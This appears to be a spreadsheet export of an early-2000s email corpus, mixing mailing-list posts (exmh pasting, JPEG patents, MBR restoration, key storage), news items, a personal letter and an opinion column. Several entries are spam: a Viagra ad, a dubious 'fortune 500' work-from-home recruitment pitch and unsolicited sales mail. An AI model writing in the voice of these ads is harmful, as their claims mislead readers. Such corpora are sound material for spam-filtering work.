  [E^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs]
</t>
  </si>
  <si>
    <t xml:space="preserve">exmh has a funky cut/paste model that is essentially all my fault.
 The middle click sets the insert point.  If you hate that, go to the
 Bindings... Simple Edit preferences window and de-select
 "Paste Sets Insert".  
 &gt;&gt;&gt;George Michaelson said:
  &gt; 
  &gt; I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then
  &gt; attempt to inject it into the exmh input windows for comp/repl, the 
 'point'
  &gt; is often an apparently random place in the text pane, not where I think I
  &gt; have current flashing cursor. 
  &gt; 
  &gt; I usually wipe out any of To:/Subject:/&lt;random body&gt; with the text. Its
  &gt; often not even beginning of line denoted, ie its an unexplicable number
  &gt; of char spaces in to the text where it inserts, 
  &gt; 
  &gt; What am I doing wrong in either X, WM, shell, EXMH which is causing this?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</si>
  <si>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Re: The Disappearing Alliance
</t>
  </si>
  <si>
    <t xml:space="preserve">
 OK, lets break this down into the Kevin Smith worldview taht equate
 everything with Star Wars...
 EU is the Republic/empire and we  are..what,..the Trade  Federation?
 Stretch this out and it could be seen that the UN is the Jedi,  complete
 with faling powers.
 Work with me folks...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] jpeg patented...
</t>
  </si>
  <si>
    <t xml:space="preserve">Ronan Waide wrote:
 &gt; Having skimmed over the patent, it appears to be describing a sort of
 &gt; image compression algorithm which gels more or less with the JPEG
 &gt; mechanism. Since I don't quite understand how jpeg works (it's hard
 &gt; math, and I'm just a dumb comp. eng.)
 It's not hard math - jpeg is a straight block-based DCT with
 quantisation - which is about the oldest image compression
 algorithm out there, and I think certainly predates 1986. So I
 really have no idea what they claim they've patented - doin DCT
 on 8x8 blocks of an image, quantising the resulting coefficients,
 or DCT in general? I'm extremely skeptical about this whole
 story...
 &gt; I don't know how exactly it
 &gt; matches up to JPEG. I'm more curious as to whether it covers MPEG,
 &gt; because it /is/ described in the context of video streams rather than
 &gt; stills, and I had a vague impression that the MPEG and JPEG
 &gt; compression techniques were similar. One of the patents it references
 &gt; also seems to hint at MPEG.
 MPEG 1, 2, 4 or 7? They're all very different compression
 algorithms.
 Anyway, here's to ogg, and hopefully the future mpeg4-standard
 compression algorithm the project comes up with (fingers
 crossed). And I wouldn't worry about the jpeg thing - in addition
 the patent runs out next year, and I would suggest that having
 failed to protect their IP for 15 years, as (iirc) is their
 responsibility, their claim would probably never hold up in
 court.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Parasites may sap male longevity
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052858,1440/
 Date: Not supplied
 Males suffer more parasitic infections than females - this could help explain 
 why they die younger, say researchers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: The absurdities of life.
</t>
  </si>
  <si>
    <t xml:space="preserve">what takes time and money: noting the amounts of each correction and basing
 the refund delivery method on the amount.  yesh, it's silly to spend $.37 (+
 labor and materials) for a $.02 refund, but maybe the only alternative right
 now is to create dichotomies that require even more time and labor - or keep
 the money (see john hall below).  your mailed refund is a function of bulk.
 in jax we're on the verge of firing at&amp;t cable for horrible customer service
 and over-charging.  what will probably happen: if the amount of overage per
 customer is significant (say $30 or more) the refund will go directly to the
 customer.  If it's less, the combined total amount will go to the city as
 lump sum settlement.
 in your case, maybe all the customers could vote on line where they'd like
 their lump sum to go.  of courese, they'd have to be notified by mail first.
 :-)
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Monday, October 07, 2002 5:02 PM
 To: Fork@xent.com
 Subject: RE: The absurdities of life.
 They are legally required to do that.  I got a similar check because an
 insurance company didn't pay a claim quickly enough.  It might have been
 $.02.
 Although they spent lots more than $.33 to mail you the check, the
 alternative seems to be to keep the money.  Do you really want companies
 to have a financial incentive to over-bill you 'just a bit' so they
 could keep it?  For a company with millions of customers, $.33/customer
 starts adding up.
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; bitbitch@magnesium.net
 &gt; So I get a check from Pac Bell today (SBC as they're called now).
 &gt; Turns out, they went to the trouble of printing out, signing, sealing
 &gt; and stamping a check just to refund me for a whole $0.33.
 &gt;
 &gt; They easily spent more than this just getting the materials together.
 &gt; Why the hell do companies bother to do this crap?  I mean, isn't there
 &gt; a bottom line in terms of cost effectiveness?  I don't think I missed
 &gt; the .33, but I sure as hell would have appreciated lower rates in lieu
 &gt; of being returned pennies.
 &gt;
 &gt; I'm truly stuck on this though.  I don't know whether to frame the
 &gt; check, burn it, or cash it in.  Maybe I should find a way to return to
 &gt; sender, so they have to spend -more- money on giving me my .33 dues.
 &gt;
 &gt;
 &gt; Does .33 even buy anything anymore?  Funny bit of it, is I couldn't
 &gt; even make a phone call these days.
 &gt;
 &gt; *boggled*
 &gt; BB.
 &gt;
 &gt; --
 &gt; Best regards,
 &gt;  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: On The Way to Telluride, On My Way Back to the World
</t>
  </si>
  <si>
    <t xml:space="preserve">On The Way to Telluride, On My Way Back to the World
 8/29/02
 Dear friends,
 I go to turn my computer on but I have forgotten where the on/off switch
 is. I have had this laptop for three years, but I haven't turned it on for
 the past two months. I look on its left side, I feel around the back, I
 find it on the right and I feel like an idiot. The screen reads "fatal
 error" and offers to "save" whatever I had typed on it last June 21st, a
 few weeks before my mother died. I hit CTL.ALT.DEL. and it is gone. Gone.
 Gone like this long, sad, summer, frozen now, and nothing seemingly matters
 but everything matters more now than ever before. Why did she have to die?
 When will this pain stop? 
 I got up this morning to fly out to Colorado. The Telluride Film Festival
 is screening my film tomorrow night, the first time it will be shown in the
 United States. My mother did not get to see this new film. She was always
 so proud of everything I did, cheering me on every day from the day where
 my memory begins. I had shown an early cut of the film to my friends last
 winter in my parent's living room, and mom would come in and out of the
 room, catching a scene here and there, saying, "Boy, that's something,
 isn't it!" 
 I don't feel right, right now. I have avoided most people for the past two
 months. I can't conceive in my mind having to face a crowd of strangers, no
 matter how supportive or appreciative they may be. Everyone says to me it
 will be good to get back to work, good to be busy, take my mind off my
 sadness, as if not aware that what I really might need is for it to be the
 other way around. At my family's insistence, I tried going on TV a few
 weeks ago to talk about the corporate crooks roaming our great land. I had
 decided to give it a try, and gave it my best shot, and ended up feeling so
 empty and more alone. I had agreed to go on "Crossfire" and Donahue (thank
 God for this guy!) on the condition that I would not have to have one of
 those stupid cable news shouting matches with three rightwingnuts where no
 one can hear (or wants to hear) what's being said. 
 They agreed to the terms, but as Bob Novak asked his first question about
 aren't my true motives to destroy capitalism and make America a socialist
 country, I just sat there for a moment and didn't respond. I thought I
 would just take the microphone off and leave - who needs these f-----s! -
 but then, my dad was with me in the studio and I looked over at him and
 smiled, and then into the camera I said, yes, Bob, that is exactly what I
 intend to do and, considering more people have bought my book than any
 other nonfiction book in America this year, I guess that means that the
 majority of Americans agree with me on this point, so look out Bob 'cause
 we're going to seize your money first! I asked the studio audience in DC
 for a show of hands of all those who agreed and I was later told that
 numerous hands shot up in the air, much to the chagrin of a stunned Bob
 Novak. I also added that I thought the Pope was onto something when he said
 that capitalism is a "sin."
 My dad liked that. He is a sweet, strong, smart man and I loved the drive
 with him back home. We took a spin through the Michigan State campus and he
 told me how he had come down here after World War II to inquire about going
 to college but thought it best to return to the assembly line where he had
 a secure job. His years during the war serving in the Marines were going to
 be counted toward his seniority. And so he worked the spark plug and oil
 filter assembly line for 33 years and provided for mom and us kids and gave
 us all his love -- which, of course, mattered the most. 
                       *        *       *       *       *        *
 Dad took me to the airport this morning, remarking on the way how much mom
 would have enjoyed this simple trip across town to Bishop Airport, how
 happy she would have been knowing that I was heading off on a new journey
 in my very fortunate life. I thought about how she came to New York for the
 screening of "Roger &amp; Me" at the New York Film Festival in 1989, and how I
 got to introduce her and my aunt as they sat in the front of the balcony,
 and how mom and Aunt Lois stood and took a long Lincoln Center bow, and how
 I stood on that stage and felt that she deserved every bit of that applause
 and more. 
 It's a bittersweet memory now, as I've just found out that the NYFF
 selection committee this year is too afraid to show my new film.
 "Politics," is what I have been told. Too "populist" for the new elite who
 now sit in judgment of what is art. "They don't want to help further your
 platform Mike," a person close to the committee tells me. "One of them even
 said, 'I know this film is going to be popular - and I don't personally
 want to contribute to its popularity.'"  So, it was decided that "Bowling
 for Columbine," a Cannes prize-winner, knighted by the Chicago Tribune as
 "one of the most effective political/polemical films ever," a film chosen
 by every single film festival around the world this fall - no, this film
 must not be shown at Lincoln Center just six blocks from the edit room
 where we made it... 77 blocks north of ground zero. I've gone too far this
 time, cut too close to the bone, stuck my lens where it doesn't belong -
 right straight through the heart of an America that is both master and
 victim of the ultra-violence. It is so sad to see this place where I will
 always remember my mother taking that bow now cowering to the whims of neos
 who, like their counterparts in Hollywood, preside over the demolition of a
 once great art form.
                      *      *      *      *      *      *      *
 My dad drops me off and goes to park in the short-term lot. He comes inside
 just as the airport personnel are taking everything out of my suitcase for
 inspection. They don't ask to see the print of the film, the only thing I
 might have had on me that is poised to do any real damage (to all the right
 people, of course). My dad and I stop short of the metal detectors and the
 next round of inspectors who are anxious to look at my smelly feet. We hug,
 and he kisses me, and I am trying hard, so very hard, to not break down in
 the middle of this airport. He tells me not to worry about him, and I tell
 him I'll call him from Detroit when I am changing planes. I go through
 security and as I am being taken aside to be searched again, I look back
 and see him still standing there, watching out for me. My dad.
 I'm on the plane and I'm thirsty, but I took the water bottle out of my bag
 when I packed it this morning. The bottle, half-drank, had been sitting
 untouched in my untouched bag since I stuck it in there the night we had to
 rush my mom to the hospital. The bottle was still there in that overnight
 bag where I put my t-shirt and sweatpants, the ones I had on for the night
 and day I sat by my mother's side in the hospital as she struggled to live,
 holding her hand, holding her head, trying to comfort her, strands of hair
 on my sweater. I can see the stains from where my tears and mucus ran
 uncontrollably down my face and onto that sweater. The doctor said she had
 an 80% chance of making it. An hour before she died, another doctor said
 the chances were 1 in 100. That was good enough for me. One in one hundred!
 I've had those odds! I won! Don't let her die! Please do everything you can
 do! Don't let her die.
 The priest came, then another priest came, and when the priests left my dad
 asked us three kids and the three grandkids to all join hands and say our
 goodbyes to mom, say whatever we wanted to about what she meant to us. (I
 am sorry... I cannot complete this paragraph right now, I can't see the
 screen through the tears...maybe someday...)
 The night before we rushed her to the hospital I had a little surprise
 planned for her. I had brought a copy of my new movie and I was going to
 show it to her. As the end credits would roll, she would get to see what
 she has seen at the end of all of my work: her name along with my dad's in
 that list of credits...and, to me, it's the only real credit that ever
 mattered -- because without them I would not have the life they gave me,
 the way they raised me... it is all a privilege I will never cease being
 thankful for.
 I never got to show her the movie that night. "Mike!" she called out from
 the porch, in a pitch of voice I had never heard. "Get your father! I don't
 feel good." She was, without warning, dying. Within 48 hours she would be
 gone.
                  *          *          *          *          *          *
 I'm walking through the Detroit airport to gate 75 for the flight to
 Denver, and I hear someone say, "OK, Mr. Stuckup, just walk right on by!" I
 turn to see it is one of anchors from the local TV station in Flint. I
 apologize. My sunglasses are on. I have been crying since I left my dad at
 the Flint airport. I explain this to her and she starts to get tears in her
 eyes. "My mom died in October," she says, and I realize that this pain that
 feels so solitary is, truthfully, a shared experience amongst us all. No
 one is immune from this loss. But instead of taking the time to tell me
 about how rough it has been for HER, she asks about how I am doing and how
 is my dad doing and did we get the flowers she and the others sent. She
 gives me her number and says to call anytime if I feel the need to talk. At
 that moment I remember what she told me -- that her mother also died this
 year-- and I think, man, get over yourself, Mike, you are not alone in
 this, and so I ask her how she is doing. "I think a lot," she says, "about
 all the things she won't see my two children grow up to do, to be. But I
 believe she is in my heart, right here, right now, and she will see it
 all."
 They call my flight and I rush over to the payphone to call my dad to see
 if he got home OK. He tells me that when he left the short- term lot he got
 talking to the person in the tollbooth who told him about her mother
 getting cancer and how she was caring for her. "She said that her bill in
 the hospital came to $60,000," he says with astonishment. "They won't be
 able to pay it. She makes six dollars an hour, no health insurance. I gave
 her a tip along with the toll."
 "You gave the tollbooth worker a tip?"
 "Well, you have to. That person could be you or me."
 That is my father. That was my mother. 
 Yours, 
 Michael Moore
 mike@michaelmoore.com
 http://www.michaelmoore.com
 PS. Thank you, all of you, who sent me your condolences and who contributed
 to the local poverty program in my mother's name. I was so moved by your
 generosity and by your words of love and kindness. It will never be
 forgotten.
 ---
 If you wish to be be unsubscribed from this mailing list, please click the
 link below and follow the instructions.
 http://www.michaelmoore.com/mailing/unsubscribe.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,
 We know your esteemed company in beach towels from Internet, and pleased to introduce us as a leading producer of high quality 100% cotton velour printed towels in China, we sincerely hope to establish a long-term business relationship with your esteemed company in this field.
 Our major items are 100% cotton full printed velour towels of the following sizes and weights with a annual production capacity of one million dozens:
 Disney Standard:
 30X60 inches, weight  305grams/SM, 350gram/PC  
 40X70 inches, weight  305grams/SM, 550gram/PC  
 Please refer to our website http://www.jacquard-towel.com/index.html for more details ie patterns about our products.
 Once you are interested in our products, we will give you a more favorable price.
 Looking forward to hearing from you soon 
 Thanks and best regards,
 Margaret/Sales Manager
 Henan Ziyang Textiles
 http://www.jacquard-towel.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: There are four lights
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#there_are_four_lights
 Date: 2002-10-01T12:53:57-05:00
 One year ago today, my (now former) manager told me to shut down my weblog and 
 remove all traces of it from my server. He tried to convince me that the 
 Internet was too small to mix the professional[1] and the personal[2]. 
 One year ago today, I gave him my answer[3], and the rest is history[4]. 
 Today, to celebrate this anniversary, I would like everyone to read my resume
 [5], admire this full-screen picture of my cat[6], and link to this post[7]. 
 There are four lights.
 [1] http://diveintopython.org/
     Dive Into Python
 [2] http://diveintomark.org/archives/2001/09/22.html#addiction_is
     dive into mark 9/22/2001: 
 [3] http://diveintomark.org/archives/2001/10/01.html#write
     dive into mark 10/1/2001: 
 [4] http://diveintomark.org/archives/2001/10/
     dive into mark October 2001 archives
 [5] http://diveintomark.org/resume/resume.html
     my resume in HTML format
 [6] http://diveintomark.org/images/j.jpg
     J, 1024 x 768
 [7] http://diveintomark.org/archives/2002/10/01.html#there_are_four_lights
     permanent link to this post
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">"Good" ol dos fdisk /mbr should do the twick
 But...but... Jac, your a big linux head....why?
 regards,
 CW
 ------------
 hi,
 i recently had to wipe linux from my pc but forgot to restore the original
 MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
 floppy. formatting the entire disk doesn't do it either.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HELP WANTED.  WORK FROM HOME REPS.
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
 1349lmrd5-948HyhJ3622xXiM0-290VZdq6044fFvN0-799hUsU07l50
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Portillo dig at Blunkett in fringe double act
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418826,215/
 Date: 2002-10-01T04:33:58+01:00
 *Politics:* Michael Portillo strode into the hostile territory of the Labour 
 party conference in Blackpool last night to mock David Blunkett as an 
 authoritarian rightwinger.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515860
 Date: Not supplied
 Rob "Pringles Can" Flickenger and others Cliff Skolnik at the O'Reilly OS X con 
 has tracked down the cause of the annoying flakiness in the wireless network 
 here -- every 20 or 30 seconds, you start getting "connection refused" messages 
 from your browser and other net-utilities. Rob "Pringles Can" Flickenger wrote 
 it up. 
 It turns out that running the great network-spy app Etherpeg[1] (or other 
 "promiscuous" network sniffers) and the built-in firewall in OS X at the same 
 time causes your computer to begin intercepting every packet sent out on your 
 segment of the wireless network and respond to it with a "rejected" message. 
 So today, Rob (and everyone else who knows about this) is going to run around 
 and tell people running Etherpeg to _turn off the firewall_ (and vice-versa). 
 Ah, fickle networking, you are such a stern mistress! Link[2] Discuss[3] (_
 Thanks, Rob!_)
 [1] http://www.oreillynet.com/pub/wlg/1414
 [2] http://www.oreillynet.com/pub/wlg/2086
 [3] http://www.quicktopic.com/boing/H/bfYib9hETQSA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Selling Travel in Today's Economy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Selling Travel in Today's Economy&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;Good morning!&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;Since it may have been awhile since you visited us
 at&amp;nbsp;&lt;a href="http://www.mailpound.com"&gt;www.mailpound.com&lt;/a&gt;&amp;nbsp;I
   wanted to update you on what is happening. When we launched the MailPound
   almost two years ago, our focus was on saving &amp;quot;Time, Toner and
   Trees&amp;quot;&amp;nbsp;by providing an alternative for&amp;nbsp;organizing the huge
   number of faxes suppliers sent travel agents each week. Our most popular
   feature was the FAM section, followed by the Weekly Sweepstakes.&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;But that has changed.&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;Like many involved in selling retail travel, we have been
   striving to find ways to succeed in a challenging environment. Additional
   commission cuts, the aftermath of 9/11, and the drop in the stock
 market, has
   had a cumulative effect on all of us. To survive, to succeed, we know
 that we
   will need to work harder, work smarter, and work together. We have
 gotten a
   tremendous amount of support from travel agents and this has translated
 into
   the ability to get more support for travel agents from suppliers.&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;Our focus has expanded from providing a resource for
 searching supplier
   Special Offers to providing a suite of tools and services that can create
   sales and raise commissions. Almost all of these services are supplier
   supported and FREE to travel agents.
 &lt;/div&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font size="2"&gt;Actively seek out the best&amp;nbsp;e-commerce
 values&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Help&amp;nbsp;you market Special Offers to your
 clients&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Host personal web sites for travel agents with
 MailPound
     content*&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Offer&amp;nbsp;higher commissions through
 consolidation&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Organize sales incentives from suppliers&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Provide new technology for fast and easy&amp;nbsp;online
     bookings&lt;/font&gt;
   &lt;li&gt;&lt;font size="2"&gt;Provide your clients with the ability to book through
 you,
     online&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;div&gt;
   &lt;font size="1"&gt;*&amp;nbsp;MP&lt;em&gt;direct&lt;/em&gt; services are offered for
 $9.95/month&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;We invite you to visit us soon at &lt;a
 href="http://www.mailpound.com"&gt;www.mailpound.com&lt;/a&gt;&amp;nbsp;or
   check out the links shown below. See how the FREE services we offer the
 travel
   agent community can help you succeed. The Summer is almost over, now is
 the
   time to prepare for the upcoming selling season.&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;ul dir="ltr" style="MARGIN-RIGHT: 0px"&gt;
   &lt;ul&gt;
     &lt;li&gt;&lt;font size="2"&gt;For more information regarding higher commissions
 and booking online: &lt;a
 href="http://www.mailpound.com/BLISS_Intro.HTM"&gt;
 www.mailpound.com/BLISS_Intro.HTM&lt;/a&gt;
     &lt;li&gt;For more information about your personal web site:&lt;br&gt;
       &lt;a
 href="http://www.mailpound.com/mpdirect"&gt;www.mailpound.com/mpdirect&lt;/a&gt;
     &lt;li&gt;To register FREE at MailPound:&lt;br&gt;
       &lt;a
 href="http://www.mailpound.com/registration/"&gt;
 www.mailpound.com/registration/&lt;/a&gt;&lt;/li&gt;
   &lt;/ul&gt;
 &lt;/ul&gt;
 &lt;div dir="ltr"&gt;
   &lt;br&gt;
   &lt;font size="2"&gt;Sincerely,&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;Bob Maier, President&lt;br&gt;
   SMART Travel Technologies, Inc.&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;&lt;a
 href="mailto:rmaier@smart2000.com"&gt;rmaier@smart2000.com&lt;/a&gt;&lt;br&gt;
   856-983-6100&amp;nbsp; Ext. 101&lt;br&gt;
   12 East Stow Road, Suite 210&lt;br&gt;
   Marlton, New Jersey 08053&lt;/font&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font color="#331172" size="2"&gt;If you do not want to receive these
 messages
 in the future, please reply to this message with REMOVE in the subject
 line.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 17:34 31/07/02 +0100, Liam Bedford wrote:
 &gt;fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.
 Will clear the Partition table entries in the MBR if it does not end with 
 valid Boot signature.
 Regards Ger
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: :: Fast Acting Viagra
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;FAST ACTING VIAGRA!!!&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;center&gt;
 &lt;font size=6 color=blue&gt;&lt;b&gt;AT 
   LAST (FAST ACTING VIAGRA)&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;a href="http://www.fastactingviagra.com"&gt;&lt;img src="http://www.fastactingviagra.com/images/fastactviagra.gif" width="550" height="251" border="0"&gt;&lt;/a&gt;
 &lt;table width="550" border="0" cellspacing="0" cellpadding="0" &gt;
 	&lt;tr&gt;
 		&lt;td align=center&gt;
 &lt;P&gt;&lt;FONT face=Arial size=2&gt;&lt;STRONG&gt;Removal
 Instructions:&lt;BR&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;font face="Arial" size="2"&gt;&lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;You
 have received this advertisement because you have opted in to receive
 internet offers and specials through affiliated websites. If you do not wish
 to receive further emails or have received the email in error you may opt-out of
 our database here: &lt;a href="http://63.205.154.38/RemoveList/RemoveMe.aspx?WHOAMI=myemail@email.com"&gt;REMOVE ME&lt;span class="GramE"&gt;&amp;nbsp;&lt;/span&gt;&lt;/a&gt;&lt;span class="GramE"&gt;
 &lt;/span&gt;Please allow 24hours for removal.&lt;/span&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;P&gt;&lt;i style="mso-bidi-font-style: normal"&gt;&lt;font face="Arial" size="1"&gt;&lt;span style="FONT-SIZE: 8pt; FONT-STYLE: italic; FONT-FAMILY: Arial; mso-bidi-font-style: normal"&gt;This
 e-mail is sent in compliance with the Information Exchange Promotion and Privacy
 Protection Act. &lt;span class="GramE"&gt;section&lt;/span&gt; 50 marked as 'Advertisement'
 with the valid 'removal' instruction.	&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [":}H&amp;*TG0BK5NK]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Encryption approach to secure web applications
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everybody!
 I'm writing a web application in java (tomcat + jsp/servlets + database 
 access with postgreSQL).
 This will be released under the GPL and will eventually be useful as a 
 framework for other web applications.
 The application main focus is e-commerce, but not limited to that.
 I would like to use some form of cryptography to protect data on the 
 database, but I have some problem figuring out the right approach.
 Above all, how to store passwords and keys in a shared web server.
 A problem that I was unable to solve is how to store keys for 
 encryption/decryption. The api that I'm using is the jca (jdk1.4.x), 
 and the methods of saving generated keys in keystores fails always. 
 I can serialize the object, and store in the database, but this is not 
 the most secure approach: this key is needed to decrypt data in the 
 database, but the database is accessible from the web application. 
 Assuming that I can find a good and secure place where to store the 
 database password, I can use a different database with different 
 user... Argh... to complex and doesn't really solve the problem.
 Where I can found good documentation about this topic?
 There is another approach that I would share with the list, something I 
 thought that can be of bit interest, but probabily wrong and insecure. 
 After all, I'm a real beginner in secure programming, and I'm here to 
 learn methods and technics.
 First of all, I need a secure way to keep database passwords secure, so 
 I have to keep them separate from the main server. The right approach 
 could be using a small java bean application that run as normal user 
 (not tomcat, so it is not shared with other web services or, worst, the 
 nobody user), that has no shell login, but has a default home directory 
 or a place where it can hold passwords and keys.
 The web application could then open an ssl connection (could be done in 
 the init method at server startup) to get database passwords. The small 
 bean could check via code signature/rmi/whatever else that the source 
 is the right one, and handle all the database connections, or give the 
 db connection/password to the main web application.
 In this way, we solve the problem of keeping the keys and passwords in 
 shared directories, and also, an attacker should get root/bean user 
 account to read data. This is not perfect, and works only if your 
 provider gives the opportunity to configure a separated java 
 application (that means, really, another server running in the 
 background).
 Any suggestions?
 Thank you,
 Mario Torre
 -- 
 Please avoid sending me Word or PowerPoint attachments.
 See http://www.fsf.org/philosophy/no-word-attachments.html 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] That wacky imam
</t>
  </si>
  <si>
    <t xml:space="preserve">http://media.guardian.co.uk/broadcast/comment/0,7493,781769,00.html
 Hamza's horrid - but we must tolerate him
 Rod Liddle
 Wednesday August 28, 2002
 The Guardian
 Sheikh Abu Hamza al-Masri, our maddest of mad mullahs and a cartoon bogeyman
 to scare the kiddies, spent a quiet and contemplative bank holiday playing
 with his own children in Victoria Park, Hackney.
 I've often wondered what incendiary Islamic fundamentalist clerics do on
 statutory public holidays. Head for the beach and maybe swing by B&amp;Q on the
 way home, I had hoped. I had this beguiling vision of Hamza paddling in the
 sea, an ice-cream cone in his one good hand, the waves tickling his shins,
 and the sheikh mentally preparing to fix those pesky shelves in the kitchen
 for once, instead of planning the extermination of Zionism and America and
 maybe me and you, too.
 But B&amp;Q and a day at the seaside is probably beyond Hamza's budget since the
 Bank of England froze his assets, so Victoria Park had to do. But he sounded
 happy enough when I spoke to him, with the babble of tiny, cheerful, Islamic
 proto-warriors in the background.
 You must know Hamza; he's the imam designed, it would seem, by the Daily
 Mail's cartoonist Mac. Large metal hook in place of a left hand. One eye
 covered by a patch, the other a baleful, watchful, milky-white. We don't
 mock the disabled any more these days, unless it's someone like Hamza whom
 we don't like; then, if you'll excuse the inapt phraseology, the gloves come
 off. So Hamza is known (with that vaulting imagination typical of the
 British right) as "Captain Hook", in articles which usually call for his
 arrest, or extradition to the US, or deportation back home to Egypt or maybe
 off to Pakistan or Afghanistan, where he fought the Russians for years and
 thus sustained his disabilities - anywhere, really; just out of here. And if
 we can't lock him up or chuck him out of the country, maybe we can force him
 to shut up.
 Because we don't like Hamza very much. We weren't that fond of him before
 September 11, but afterwards, in that nervy, paranoid few months when we all
 thought the sky might fall in, our disapprobation turned into political
 persecution.
 And now the Daily Mirror is agitating again for his arrest because they've
 got hold of secret videos of the man behaving in an even more inflammatory
 manner, urging warfare on and looting of enemies of Islam. All out of
 context, and a very long time ago, says the imam, not unduly bothered. But
 perhaps he should be, because our reputation for broad-mindedness and
 tolerance towards people like Hamza was thinning even before the Mirror's
 scoop.
 Hamza preaches, or preached, at the scary Finsbury Park Mosque - so, earlier
 this year, the Charity Commissioners banned him from doing so because of his
 allegedly inflammatory remarks. I didn't know Charity Commissioners were
 meant to do stuff like that.
 He has had his passport seized and not returned; his assets have been
 frozen. He is tailed by the police every now and then, and his access to the
 media is restricted by internal policing within broadcasting corporations
